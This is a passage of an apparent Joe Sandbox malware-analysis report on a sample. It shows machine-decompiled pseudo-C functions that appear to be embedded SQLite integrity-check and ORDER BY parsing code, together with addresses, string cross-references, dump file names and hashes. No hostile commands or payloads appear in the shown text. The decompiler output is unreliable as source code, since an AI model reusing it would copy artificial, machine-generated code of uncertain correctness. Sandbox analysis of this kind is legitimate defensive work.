													_t208 =  *_t166;
													if(_t208 == 0) {
														goto L33;
													} else {
														if( *((char*)(_t220 + 0xd)) == 0) {
															 *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x20))))(_t166, 1);
															_t242 = _t242 + 8;
														}
														_t129 = _v56;
														if( *((char*)(_t220 + 0x11)) != 5) {
															 *((char*)(_t220 + 0x11)) = 1;
														}
													}
												}
												goto L34;
											} else {
												if( *((char*)(_t220 + 7)) != 0) {
													L25:
													_t209 =  *(_t220 + 0x40);
													_t216 =  *_t209;
													_t129 =  *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x18))))(_t209, _t220 + 0x50);
													_t242 = _t242 + 8;
													_v56 = _t129;
													if(_t129 != 0) {
														goto L35;
													} else {
														_t216 = 0 |  *((intOrPtr*)(_t220 + 0xc)) == 0x00000000;
														_t129 = E00DA04E0(_t220,  *((intOrPtr*)(_t220 + 0xc)) == 0);
														_v56 = _t129;
														 *((char*)(_t220 + 0x10)) = 0;
														L34:
														if(_t129 == 0) {
															goto L38;
														} else {
															goto L35;
														}
													}
												} else {
													_t129 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x14))))(_t156, 2);
													_t242 = _t242 + 8;
													_v56 = _t129;
													if(_t129 != 0) {
														L35:
														_t207 = _t129 & 0x000000ff;
														if(_t207 == 0xd || _t207 == 0xa) {
															 *(_t220 + 0x28) = _t129;
															 *((char*)(_t220 + 0x10)) = 6;
															 *((intOrPtr*)(_t220 + 0xc8)) = 0xda2e00;
														}
														L81:
														if(_t129 == 0) {
															L79:
															 *((char*)(_t220 + 0x10)) = 1;
															 *((char*)(_t220 + 0x17)) = 1;
															_pop(_t222);
															_pop(_t229);
															return E00E76672(_t129, _t186, _v8 ^ _t242, _t216, _t222, _t229);
														} else {
															goto L82;
														}
													} else {
														goto L25;
													}
												}
											}
										}
									}
								} else {
									E00D9F6A0(_t220);
									_pop(_t224);
									_pop(_t239);
									return E00E76672(0x308, _t186, _v8 ^ _t242, _t216, _t224, _t239);
								}
							} else {
								_t216 =  &_v52;
								_t185 = E00DA2120(__ecx,  &_v52);
								_t226 = _t185;
								if(_t185 != 0) {
									goto L83;
								} else {
									if(_v52 == _t185) {
										L38:
										if( *((char*)(_t220 + 0xc)) != 0 ||  *((char*)(_t220 + 0x17)) == 0) {
											L49:
											_t187 = _t220;
											_t226 = E00DA0B80(_t186, _t187);
											_t125 =  *(_t220 + 0xd4);
											_v56 = _t226;
											_v52 = _t125;
											if(_t125 != 0) {
												goto L50;
											}
											goto L65;
										} else {
											_t158 =  *(_t220 + 0x3c);
											_t216 =  &_v36;
											_t160 =  *((intOrPtr*)( *((intOrPtr*)( *_t158 + 8))))(_t158,  &_v36, 0x10, 0x18, 0);
											_t242 = _t242 + 0x14;
											_v56 = _t160;
											if(_t160 == 0) {
												L43:
												_t204 = _t220 + 0x68;
												_t234 = 0xc;
												_t216 =  &_v36;
												while( *_t204 ==  *_t216) {
													_t204 = _t204 + 4;
													_t216 = _t216 + 4;
													_t234 = _t234 - 4;
													if(_t234 >= 0) {
														continue;
													} else {
													}
													goto L49;
												}
												E00D9F4E0(_t220, _t234);
												if( *((char*)(_t220 + 0x16)) != 0) {
													_t163 =  *(_t220 + 0x3c);
													 *((intOrPtr*)( *((intOrPtr*)( *_t163 + 0x48))))(_t163, 0, 0, 0);
													_t242 = _t242 + 0x10;
												}
												goto L49;
											} else {
												if(_t160 != 0x20a) {
													L82:
													_t226 = _v56;
													goto L83;
												} else {
													asm("xorps xmm0, xmm0");
													asm("movaps [esp+0x20], xmm0");
													goto L43;
												}
											}
										}
									} else {
										goto L6;
									}
								}
							}
						}
					}
				}
			}

0x00da2380
0x00da2380
0x00da2386
0x00da2389
0x00da2390
0x00da2396
0x00da2398
0x00da239a
0x00da239e
0x00da23a2
0x00da23a8
0x00da23ae
0x00da2666
0x00da266a
0x00da2672
0x00da2678
0x00da267a
0x00da2683
0x00da2689
0x00da268b
0x00da268f
0x00da268f
0x00da2692
0x00da2696
0x00da269d
0x00da269d
0x00da26a1
0x00da26a8
0x00da26ae
0x00da26b0
0x00da26c4
0x00da26c6
0x00da26ca
0x00da26ca
0x00da26d0
0x00da26d0
0x00da26da
0x00da26dc
0x00da26e0
0x00da26e0
0x00da26e1
0x00da26ea
0x00da26ef
0x00da26f2
0x00da26f6
0x00da26fb
0x00da2701
0x00da270c
0x00da2715
0x00da2717
0x00da2726
0x00da2728
0x00da2728
0x00da2715
0x00da272b
0x00000000
0x00da23b4
0x00da23b7
0x00da272f
0x00da2733
0x00da27da
0x00000000
0x00da2743
0x00da2745
0x00000000
0x00da274b
0x00da274b
0x00da2753
0x00da2764
0x00000000
0x00da275b
0x00da275b
0x00da2760
0x00da27ae
0x00da27b4
0x00da27b6
0x00da27b6
0x00da27bc
0x00da27bf
0x00000000
0x00da2762
0x00da2766
0x00da2766
0x00da2769
0x00da276d
0x00000000
0x00da276f
0x00da2773
0x00da2777
0x00da2781
0x00da2783
0x00da2785
0x00da278a
0x00000000
0x00da278c
0x00da2792
0x00da279c
0x00da27a4
0x00da27a9
0x00000000
0x00da27a9
0x00da278a
0x00da276d
0x00da2760
0x00da2753
0x00da2745
0x00da23bd
0x00da23bd
0x00da23bd
0x00da23c0
0x00da23c8
0x00da23cd
0x00da23d1
0x00da27e6
0x00da27e8
0x00da27f3
0x00da27f4
0x00da27ff
0x00da23d7
0x00da23db
0x00da23fc
0x00da2400
0x00da2421
0x00da2426
0x00da242c
0x00da2435
0x00da2443
0x00da2450
0x00da2452
0x00da2455
0x00da245b
0x00000000
0x00da2461
0x00da2461
0x00da2465
0x00000000
0x00da2465
0x00da2437
0x00da2439
0x00da243d
0x00000000
0x00da243d
0x00da246b
0x00da246d
0x00000000
0x00da2473
0x00da2473
0x00da2479
0x00da247f
0x00da2492
0x00da2494
0x00da2497
0x00da249d
0x00da24a5
0x00da24c0
0x00da24c2
0x00da24c5
0x00da24cb
0x00da24d4
0x00da24d9
0x00da24ea
0x00da24f4
0x00da24f7
0x00da24fb
0x00da24fe
0x00da2502
0x00da2508
0x00da250a
0x00da250d
0x00da250d
0x00da2502
0x00da24cb
0x00da249d
0x00da2513
0x00da2516
0x00da251a
0x00da256c
0x00da2598
0x00da2598
0x00da256e
0x00da256e
0x00da2571
0x00da2575
0x00000000
0x00da2577
0x00da257b
0x00da2583
0x00da2585
0x00da2585
0x00da258c
0x00da2590
0x00da2592
0x00da2592
0x00da2590
0x00da2575
0x00000000
0x00da251c
0x00da2520
0x00da2535
0x00da2535
0x00da253d
0x00da2542
0x00da2544
0x00da2547
0x00da254d
0x00000000
0x00da254f
0x00da2556
0x00da2559
0x00da255e
0x00da2562
0x00da259c
0x00da259e
0x00000000
0x00000000
0x00000000
0x00000000
0x00da259e
0x00da2522
0x00da2528
0x00da252a
0x00da252d
0x00da2533
0x00da25a0
0x00da25a0
0x00da25a6
0x00da25b1
0x00da25b4
0x00da25b8
0x00da25b8
0x00da27de
0x00da27e0
0x00da27c1
0x00da27c1
0x00da27c5
0x00da27c9
0x00da27ca
0x00da27d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00da2533
0x00da2520
0x00da251a
0x00da246d
0x00da2402
0x00da2409
0x00da2410
0x00da2411
0x00da2420
0x00da2420
0x00da23dd
0x00da23dd
0x00da23e3
0x00da23e8
0x00da23ec
0x00000000
0x00da23f2
0x00da23f6
0x00da25c7
0x00da25cb
0x00da2647
0x00da2647
0x00da264e
0x00da2650
0x00da2656
0x00da265a
0x00da2660
0x00000000
0x00000000
0x00000000
0x00da25d3
0x00da25d3
0x00da25d6
0x00da25e7
0x00da25e9
0x00da25ec
0x00da25f2
0x00da2607
0x00da2607
0x00da260a
0x00da260f
0x00da2613
0x00da2619
0x00da261c
0x00da261f
0x00da2622
0x00000000
0x00000000
0x00da2624
0x00000000
0x00da2622
0x00da2628
0x00da2631
0x00da2633
0x00da2642
0x00da2644
0x00da2644
0x00000000
0x00da25f4
0x00da25f9
0x00da27e2
0x00da27e2
0x00000000
0x00da25ff
0x00da25ff
0x00da2602
0x00000000
0x00da2602
0x00da25f9
0x00da25f2
0x00000000
0x00000000
0x00000000
0x00da23f6
0x00da23ec
0x00da23db
0x00da23d1
0x00da23b7

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA27A9

Part of subcall function 00DA2120: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DA2205

Strings

%s at line %d of [%.10s], xrefs: 00DA24E3
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DA24D4
cannot open file, xrefs: 00DA24DE

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$cannot open file
API String ID: 885266447-3209268730
Opcode ID: 1f46007ec7d51c363c4bdf5a242201e15241105d918dc0c78b84c9e41d067268
Instruction ID: 24d5aa082effa70831845ece94eecfe2992fc2b9d422311c8f6189c8dd16f1a6
Opcode Fuzzy Hash: 1f46007ec7d51c363c4bdf5a242201e15241105d918dc0c78b84c9e41d067268
Instruction Fuzzy Hash: 77E1B170A04742AFDB15CF2DC850B7AB7E1BF86314F08465DE4989B281D7B4E944CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2ED0 Relevance: 6.6, Strings: 5, Instructions: 392
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00DB2ED0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _v8;
				char _v116;
				char* _v124;
				signed int _v127;
				short _v128;
				char* _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				char* _v148;
				char* _v152;
				char* _v160;
				signed int _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				unsigned int _v176;
				char* _v180;
				intOrPtr _v184;
				char _v188;
				void* _v189;
				intOrPtr _v196;
				intOrPtr _v200;
				signed int _v204;
				unsigned int _v208;
				char _v212;
				char _v220;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t186;
				intOrPtr _t195;
				intOrPtr _t210;
				intOrPtr _t213;
				char* _t218;
				signed int _t219;
				intOrPtr _t226;
				signed int _t234;
				signed int _t243;
				void* _t253;
				signed int _t254;
				intOrPtr* _t262;
				unsigned int _t264;
				char _t266;
				char* _t274;
				void* _t289;
				void* _t295;
				intOrPtr _t296;
				signed char _t299;
				char _t303;
				signed char _t308;
				intOrPtr _t323;
				signed int _t325;
				signed int _t326;
				char* _t327;
				char* _t328;
				unsigned int _t329;
				unsigned int _t331;
				intOrPtr _t337;
				signed int _t339;
				void* _t340;

				_t186 =  *0xed8944; // 0xccebfc3b
				_v8 = _t186 ^ _t339;
				_t323 = __ecx;
				_v212 = _a12;
				_v196 = __edx;
				_v200 = __ecx;
				_t262 =  *((intOrPtr*)(__ecx + 4));
				_v208 =  *( *((intOrPtr*)(_t262 + 4)) + 0x1c);
				if( *((char*)(__ecx + 9)) != 0) {
					 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(__ecx + 0xc)) + 1;
					if( *((char*)(__ecx + 0xa)) == 0) {
						E00DA6D30(__ecx);
					}
				}
				_v188 = _t262;
				asm("xorps xmm0, xmm0");
				_v184 =  *_t262;
				_t264 =  *(_t262 + 0x2c);
				_v172 = _a8;
				_v176 = _t264;
				_v152 = 0;
				_v180 = 0;
				_v124 = 0;
				_v144 =  &_v116;
				_v148 = 0;
				_v140 = 0x64;
				_v136 = 0x3b9aca00;
				_v132 = 0;
				_v128 = 0x100;
				asm("movups [ebp-0xa4], xmm0");
				if(_t264 != 0) {
					_t324 = (_t264 >> 3) + 1;
					_t328 = L00D94E70((_t264 >> 3) + 1, 0);
					_t340 = _t340 + 8;
					if(_t328 == 0) {
						_v180 = _t328;
						goto L43;
					} else {
						E00E79BD0(_t324, _t328, 0, _t324);
						_t340 = _t340 + 0xc;
						_v180 = _t328;
						_t218 = E00D9D9A0( *(_t262 + 0x20));
						_v124 = _t218;
						if(_t218 == 0) {
							L43:
							_v164 = 1;
						} else {
							_t219 =  *0xeda1cc; // 0x40000000
							_t40 = _t219 /  *(_t262 + 0x20) + 1; // 0x40000001
							_t329 = _t40;
							if(_t329 <= _v176) {
								asm("bts eax, esi");
								_v180[_t329 >> 3] = _v180[_t329 >> 3] & 0x000000ff;
							}
							_v160 = "Main freelist: ";
							asm("bswap eax");
							asm("bswap eax");
							E00DB2280( &_v188, 1,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t262 + 0xc)) + 0x38)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t262 + 0xc)) + 0x38)) + 0x24)));
							_v160 = 0;
							_t340 = _t340 + 8;
							_t325 = 0;
							 *( *((intOrPtr*)(_t262 + 4)) + 0x1c) =  *( *((intOrPtr*)(_t262 + 4)) + 0x1c) & 0xffdfffff;
							_t226 = _a4;
							if(_t226 > 0) {
								_t296 = _v196;
								while(_v172 != 0) {
									_t337 =  *((intOrPtr*)(_t296 + _t325 * 4));
									if(_t337 != 0) {
										if( *((char*)(_t262 + 0x11)) != 0 && _t337 > 1) {
											_t253 = E00DA7470(_v188, _t337,  &_v189,  &_v204);
											_t340 = _t340 + 8;
											if(_t253 == 0) {
												_t299 = _v189;
												_t254 = _v204;
												if(_t299 != 1 || _t254 != 0) {
													_push(_t254);
													_push(_t299 & 0x000000ff);
													_push(0);
													_push(1);
													E00DB21F0( &_v188, "Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)", _t337);
													_t340 = _t340 + 0x1c;
												}
											} else {
												if(_t253 == 7 || _t253 == 0xc0a) {
													_v164 = 1;
												}
												E00DB21F0( &_v188, "Failed to read ptrmap key=%d", _t337);
												_t340 = _t340 + 0xc;
											}
										}
										E00DB2690( &_v188,  *((intOrPtr*)(_v196 + _t325 * 4)),  &_v220, 0xffffffff, 0x7fffffff);
										_t226 = _a4;
										_t340 = _t340 + 0xc;
										_t296 = _v196;
									}
									_t325 = _t325 + 1;
									if(_t325 < _t226) {
										continue;
									}
									goto L24;
								}
							}
							L24:
							_t326 = 1;
							 *( *((intOrPtr*)(_t262 + 4)) + 0x1c) = _v208;
							if(_v176 >= 1) {
								while(_v172 != 0) {
									_t331 = _t326 >> 3;
									_v208 = _t331;
									_t308 = 1 << (_t326 & 0x00000007);
									_v204 = _t308;
									if((_v180[_t331] & _t308) == 0) {
										if(_t326 >= 2) {
											_t87 = _t326 - 2; // -1
											_t243 =  *0xeda1cc; // 0x40000000
											_t295 = (0 | _t87 - _t87 % ((0xcccccccd *  *(_t262 + 0x24) >> 0x00000020 >> 0x00000002) + 0x00000001) == _t243 /  *(_t262 + 0x20) - 0x00000001) + _t87 - _t87 % ((0xcccccccd *  *(_t262 + 0x24) >> 0x20 >> 2) + 1) + 2;
											_t331 = _v208;
										} else {
											_t295 = 0;
										}
										if(_t295 != _t326 ||  *((char*)(_t262 + 0x11)) == 0) {
											E00DB21F0( &_v188, "Page %d is never used", _t326);
											_t340 = _t340 + 0xc;
										}
									}
									if((_v180[_t331] & _v204) != 0) {
										if(_t326 >= 2) {
											_t114 = _t326 - 2; // -1
											_t234 =  *0xeda1cc; // 0x40000000
											_t289 = (0 | _t114 - _t114 % ((0xcccccccd *  *(_t262 + 0x24) >> 0x00000020 >> 0x00000002) + 0x00000001) == _t234 /  *(_t262 + 0x20) - 0x00000001) + 2 + _t114 - _t114 % ((0xcccccccd *  *(_t262 + 0x24) >> 0x20 >> 2) + 1);
										} else {
											_t289 = 0;
										}
										if(_t289 == _t326 &&  *((char*)(_t262 + 0x11)) != 0) {
											E00DB21F0( &_v188, "Pointer map page %d is referenced", _t326);
											_t340 = _t340 + 0xc;
										}
									}
									_t326 = _t326 + 1;
									if(_t326 <= _v176) {
										continue;
									} else {
									}
									goto L44;
								}
							}
						}
					}
					L44:
					_t323 = _v200;
				}
				E00D9DAB0(_v124, _t323);
				_t327 = _v180;
				if(_t327 != 0) {
					if( *0xed9418 == 0) {
						 *0xed9448(_t327);
						goto L52;
					} else {
						_t210 =  *0xedf228;
						if(_t210 != 0) {
							 *0xed9474(_t210);
							_t340 = _t340 + 4;
						}
						 *0xedf030 =  *0xedf030 -  *0xed9450(_t327);
						 *0xedf054 =  *0xedf054 - 1;
						 *0xed9448(_t327);
						_t213 =  *0xedf228;
						_t340 = _t340 + 8;
						if(_t213 != 0) {
							 *0xed947c(_t213);
							L52:
							_t340 = _t340 + 4;
						}
					}
				}
				if(_v164 == 0) {
					_t266 = _v144;
					_t195 = _v168;
				} else {
					if((_v127 & 0x00000004) != 0) {
						_t303 = _v144;
						if(_t303 != 0) {
							_t274 = _v148;
							if(_t274 == 0) {
								L62:
								E00D95050(_t303);
								_t340 = _t340 + 4;
							} else {
								if( *((intOrPtr*)(_t274 + 0x1d0)) == 0) {
									if(_t303 <  *((intOrPtr*)(_t274 + 0x128)) || _t303 >=  *((intOrPtr*)(_t274 + 0x12c))) {
										goto L62;
									} else {
										 *_t303 =  *(_t274 + 0x124);
										 *(_t274 + 0x124) = _t303;
									}
								} else {
									E00D950C0(_t274, _t303);
								}
							}
						}
						_v127 = _v127 & 0x000000fb;
					}
					_t266 = 0;
					_t195 = _v168 + 1;
					_v144 = 0;
					_v168 = _t195;
				}
				_t302 = _v212;
				 *_v212 = _t195;
				if(_t195 == 0) {
					if((_v127 & 0x00000004) != 0) {
						if(_t266 != 0) {
							_t327 = _v148;
							if(_t327 == 0) {
								L75:
								E00D95050(_t266);
							} else {
								if(_t327[0x1d0] == _t195) {
									if(_t266 < _t327[0x128] || _t266 >= _t327[0x12c]) {
										goto L75;
									} else {
										 *_t266 = _t327[0x124];
										_t327[0x124] = _t266;
									}
								} else {
									_t302 = _t266;
									E00D950C0(_t327, _t266);
								}
							}
						}
						_v127 = _v127 & 0x000000fb;
					}
					_t266 = 0;
					_v144 = 0;
				}
				if( *((char*)(_t323 + 9)) != 0) {
					_t173 = _t323 + 0xc;
					 *_t173 =  *((intOrPtr*)(_t323 + 0xc)) + 0xffffffff;
					if( *_t173 == 0) {
						E00DA6CF0(_t323);
						_t266 = _v144;
					}
				}
				if(_t266 == 0) {
					L86:
					return E00E76672(_t266, _t262, _v8 ^ _t339, _t302, _t323, _t327);
				} else {
					_v132[_t266] = 0;
					if(_v136 <= 0 || (_v127 & 0x00000004) != 0) {
						_t266 = _v144;
						goto L86;
					} else {
						return E00E76672(E00D97330( &_v148, _t302), _t262, _v8 ^ _t339, _t302, _t323, _t327);
					}
				}
			}

0x00db2ed9
0x00db2ee0
0x00db2ee9
0x00db2eeb
0x00db2ef1
0x00db2ef7
0x00db2f01
0x00db2f0a
0x00db2f10
0x00db2f12
0x00db2f19
0x00db2f1b
0x00db2f1b
0x00db2f19
0x00db2f20
0x00db2f26
0x00db2f2b
0x00db2f31
0x00db2f37
0x00db2f40
0x00db2f46
0x00db2f50
0x00db2f5a
0x00db2f61
0x00db2f67
0x00db2f71
0x00db2f7b
0x00db2f85
0x00db2f8c
0x00db2f92
0x00db2f9b
0x00db2fa6
0x00db2faf
0x00db2fb1
0x00db2fb6
0x00db327c
0x00000000
0x00db2fbc
0x00db2fc0
0x00db2fc5
0x00db2fc8
0x00db2fd1
0x00db2fd6
0x00db2fdb
0x00db3282
0x00db3282
0x00db2fe1
0x00db2fe1
0x00db2feb
0x00db2feb
0x00db2ff4
0x00db3008
0x00db300b
0x00db300b
0x00db300e
0x00db3026
0x00db3032
0x00db3035
0x00db303a
0x00db3044
0x00db304a
0x00db304c
0x00db3053
0x00db3058
0x00db305e
0x00db3070
0x00db307d
0x00db3082
0x00db308c
0x00db30b1
0x00db30b6
0x00db30bb
0x00db30ea
0x00db30f0
0x00db30f9
0x00db30ff
0x00db3103
0x00db3104
0x00db3106
0x00db3115
0x00db311a
0x00db311a
0x00db30bd
0x00db30c0
0x00db30c9
0x00db30c9
0x00db30e0
0x00db30e5
0x00db30e5
0x00db30bb
0x00db313a
0x00db313f
0x00db3142
0x00db3145
0x00db3145
0x00db314b
0x00db314e
0x00000000
0x00000000
0x00000000
0x00db314e
0x00db3070
0x00db3154
0x00db3157
0x00db3162
0x00db316b
0x00db3171
0x00db3188
0x00db318e
0x00db3199
0x00db319b
0x00db31a4
0x00db31a9
0x00db31b4
0x00db31c6
0x00db31dd
0x00db31df
0x00db31ab
0x00db31ab
0x00db31ab
0x00db31e7
0x00db31fc
0x00db3201
0x00db3201
0x00db31e7
0x00db3213
0x00db3218
0x00db3223
0x00db3235
0x00db324c
0x00db321a
0x00db321a
0x00db321a
0x00db3250
0x00db3265
0x00db326a
0x00db326a
0x00db3250
0x00db326d
0x00db3274
0x00000000
0x00000000
0x00db327a
0x00000000
0x00db3274
0x00db3171
0x00db316b
0x00db2fdb
0x00db328c
0x00db328c
0x00db328c
0x00db3295
0x00db329a
0x00db32a2
0x00db32ab
0x00db32f3
0x00000000
0x00db32ad
0x00db32ad
0x00db32b4
0x00db32b7
0x00db32bd
0x00db32bd
0x00db32c7
0x00db32d0
0x00db32d7
0x00db32dd
0x00db32e2
0x00db32e7
0x00db32ea
0x00db32f9
0x00db32f9
0x00db32f9
0x00db32e7
0x00db32ab
0x00db3303
0x00db3373
0x00db3379
0x00db3305
0x00db3309
0x00db330b
0x00db3313
0x00db3315
0x00db331d
0x00db334f
0x00db3350
0x00db3355
0x00db331f
0x00db3326
0x00db3335
0x00000000
0x00db333f
0x00db3345
0x00db3347
0x00db3347
0x00db3328
0x00db3328
0x00db3328
0x00db3326
0x00db331d
0x00db3358
0x00db3358
0x00db3362
0x00db3364
0x00db3365
0x00db336b
0x00db336b
0x00db337f
0x00db3385
0x00db3389
0x00db338f
0x00db3393
0x00db3395
0x00db339d
0x00db33d2
0x00db33d3
0x00db339f
0x00db33a5
0x00db33b8
0x00000000
0x00db33c2
0x00db33c8
0x00db33ca
0x00db33ca
0x00db33a7
0x00db33a7
0x00db33ab
0x00db33ab
0x00db33a5
0x00db339d
0x00db33db
0x00db33db
0x00db33df
0x00db33e1
0x00db33e1
0x00db33eb
0x00db33ed
0x00db33ed
0x00db33f1
0x00db33f5
0x00db33fa
0x00db33fa
0x00db33f1
0x00db3402
0x00db343c
0x00db344e
0x00db3404
0x00db3407
0x00db3412
0x00db3436
0x00000000
0x00db341a
0x00db3435
0x00db3435
0x00db3412

Strings

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d), xrefs: 00DB310F
Page %d is never used, xrefs: 00DB31F6
Pointer map page %d is referenced, xrefs: 00DB325F
Failed to read ptrmap key=%d, xrefs: 00DB30DA
d, xrefs: 00DB2F71

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Failed to read ptrmap key=%d$Page %d is never used$Pointer map page %d is referenced$d
API String ID: 0-1091876281
Opcode ID: 68acf7943ccc2181f184074229857315812bb8793a2209d6e4e4ecaf9ab8fa74
Instruction ID: a35cd6e6aca67ed47ff1300ccd52968202a2d1ab7bf9c38e4aec19aab37e0796
Opcode Fuzzy Hash: 68acf7943ccc2181f184074229857315812bb8793a2209d6e4e4ecaf9ab8fa74
Instruction Fuzzy Hash: 9EF17271E01228CBDF24CF18D854BEAB7B5BF45304F1881A9D84AA7291DB319E85DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E83D70 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 450COMMON

Download Yara Rule

Strings

r;, xrefs: 00E84184, 00E83FFC, 00E83EB4

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: r;
API String ID: 0-371839433
Opcode ID: 3c3117d35cb6b543a2871cee2a2e3606df60189b31471fd9ead53be5b8330577
Instruction ID: 0d2685244042048aaceb174712e10238b9fe891b06a955c4758c6a4ff996fc15
Opcode Fuzzy Hash: 3c3117d35cb6b543a2871cee2a2e3606df60189b31471fd9ead53be5b8330577
Instruction Fuzzy Hash: 14F11EB1E012199BDF14DFA8D8906AEBBB1FF48314F158269D91DB7384D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00DF0B50 Relevance: 5.5, Strings: 4, Instructions: 463COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 00DF0BA6
d, xrefs: 00DF0DB7
1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00DF0B97
misuse, xrefs: 00DF0BA1

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$d$misuse
API String ID: 0-14470748
Opcode ID: 85e7eedbecd76897b2a6cf3d4539432d32a1a2f682e473038a43a0227e5f6e41
Instruction ID: 54a53fc12a2a886558bfc28742db1f4835dc45ca877369bc7ee856198b601610
Opcode Fuzzy Hash: 85e7eedbecd76897b2a6cf3d4539432d32a1a2f682e473038a43a0227e5f6e41
Instruction Fuzzy Hash: D80292706043449FD724CF24C494B7ABBE1AF84714F5A892DFA899B252DB31EC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DCAA90 Relevance: 5.3, Strings: 4, Instructions: 327COMMON

Download Yara Rule

Strings

%r %s BY term out of range - should be between 1 and %d, xrefs: 00DCAE2E
ORDER, xrefs: 00DCAE28
%r ORDER BY term does not match any column in the result set, xrefs: 00DCAE58
too many terms in ORDER BY clause, xrefs: 00DCAAD2

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: %r %s BY term out of range - should be between 1 and %d$%r ORDER BY term does not match any column in the result set$ORDER$too many terms in ORDER BY clause
API String ID: 0-3892209816
Opcode ID: ccaac09e1e641ffcc00240f61ab722d0c653f2b843106517fe14b1d85f9e583e
Instruction ID: 921c1a72949ea4c05ff7399198ba2f443247d036dfe9c1e9fd7d3ac3bb7f928f
